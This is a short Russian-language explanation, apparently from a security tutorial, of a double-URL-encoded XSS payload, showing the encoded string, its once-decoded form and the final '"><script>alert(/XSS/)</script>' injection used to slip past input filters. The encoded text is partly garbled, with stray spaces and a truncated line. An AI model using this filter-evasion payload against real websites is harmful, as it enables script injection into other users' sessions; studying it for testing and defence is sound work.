Полная полезная нагрузка XSS:
% +2522% 253e% 253c% 2573% 2563% 2572% 2569% 2570% 2574% 253e% 2561% 256C% 2565% 2572% 2574% 2528% 252F% 2558% 2553% 2553% 252F% 2529% 253c% 252F% 2573% 2563% 2572% 2569% 2570% 2574% 253e = XSS-М
Если вы выполняете один URL-декодирование, вы получаете следующее:
%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2f%58%53%53%2f%29%3c%2f%73%63%72%69%70%74%3
Если вы снова выполните 2-ое декодирование URL, вы получите полезную нагрузку:
"><script>alert(/XSS/)</script>=XSS-ME
Это полезная нагрузка, закодированная в doulbe-url. когда %2522 является url-декодированным, оно становится: %22, потому что hex-25 является%, а когда оно снова декодируется url, оно становится ".